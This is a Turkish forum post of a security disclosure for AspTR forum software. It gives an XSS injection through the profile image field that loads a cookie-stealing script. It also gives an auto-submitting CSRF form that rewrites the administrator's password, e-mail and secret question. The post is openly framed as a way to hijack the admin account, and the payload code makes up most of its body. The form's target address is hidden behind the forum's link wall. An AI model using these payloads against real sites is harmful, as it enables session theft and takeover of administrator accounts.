AspTR All version CSRF ve XSS - IRCForumları - IRC ve mIRC Kullanıcılarının Buluşma Noktası

Ocean · 09 Temmuz 2010, 01:25

Güvenlik açığı [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] sitesinde yayınlandı.

ilk önce XSS den bahsetmek istiyorum . Betik normal üyelerin profillerindeki resim yolundan kaynaklanıyor.

değişkenlere baktığımızda dilediğimizi yazabildiğimizi görebiliyoruz ve resimde de hiç bir filtrelemenin olmadığını görüyoruz .

örnek = <img src="sitedebelirtilenresimyolu.jpg"/>

Profilde hiç bir filtreleme yoluna gitmemiş o zaman düşünüyoruz adam foto seçimi eklemiş ve bunun betiğimizi <img src="sitedebelirtilenresimyolu.jpg"/> gibi bir tag aralığında yayınlanmasını sağlamış + olarak adam bana hiç bir kısıtlama getirmemiş o zaman ben profilimdeki resim kodumu "/> şeklinde kapatarak yeni taga geçiş yapıyorum ve update ediyorum.

siteresmi.jpg"/><script src="cookie.js"/> bundan sonrası ise oyuncak zaten foruma basit bir konu açarak adminin konuya girmesini sağlamam onu hacklemem için yeterli bi neden olacaktır.

ikinci bir güvenlik açığı ise CSRF profil updatede hiç bir filtreleme yok o zaman aşağıdaki betiğe yöneticiyi tıklatmak yeni adminin bizim olmamızı sağlayacak kadar yeterli bir nedendir .

Alıntı:

<frewal>
Target site :<form method="POST" action="
Bu forumdaki linkleri ve resimleri görebilmek için en az 25 mesajınız olması gerekir.
type="text" name="sifre" size="49" value="sifre"></p>
<p>E-Mail : <input type="text" name="mail" size="49" value="mail"></p>
<p>Secret question : <input type="text" name="soru" size="49" value="soru"></p>
<p><span id="result_box" class="short_text"><span style title>Reply
: </span></span><input type="text" name="cevap" size="49" value="cevap"></p>
<p>Name : <input type="text" name="ad" size="49" value="ad"></p>
<p>Last Name : <input type="text" name="soyad" size="49" value="soyad"></p>
<p>Dont Changing : <select size="1" name="sehir" id="sehir">
<option value="Adana">Adana</option></p>
<p>Profession :<input type="text" name="meslek" size="49" value="meslek"></p>
<p>Msn :<input type="text" name="msn" size="49" value="msn"></p>
<p>Web :<input type="text" name="web" size="49" value="web"></p>
<p>
***
:<select name="cinsiyet" size="1">
<option>Bay</option>
<option>Bay</option>
<option>Bayan</option>
</select>
</p>
<p>Avatar :<input type="text" name="icon" size="49" value="icon"></p>
<p> </p>
<p> </p>
<script> document.forms[0].submit() </script>
</form>
</frewal>

umuyoruzki script masterleri kisa sürede acigi kapatma yoluna giderler.

olympos.net

Benzer Konular
Konu	Konuyu Başlatan	Forum	Cevaplar	Son Mesaj
Version	Deep	IRCd	0	01 Şubat 2012 15:47
Sky-dancer version koruması ile ban version çakışması	Keen	Unreal IRCd	11	03 Kasım 2009 05:14
Version	SauRoN	mIRC Scripting Sorunları	16	15 Aralık 2007 12:41
Version	Silence	Unreal IRCd	0	09 Ağustos 2007 14:05
Version..	ad3m	mIRC Scripting Sorunları	6	17 Haziran 2007 16:53

Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)

Etiketlenen Kullanıcılar
Etiketlemek istediğiniz kullanıcılar arasına virgül koyunuz. Örnek: nokta,sukunet,NucLear

5846 sayılı Fikir ve Sanat Eserleri Kanunu gereğince sitemizde telif hakkı bulunan mp3,video v.b. eserlerin paylaşımı yasaktır. Yasal işlem olması halinde paylaşan kişi yada kişilerin bilgileri gerekli kuruma verilecektir.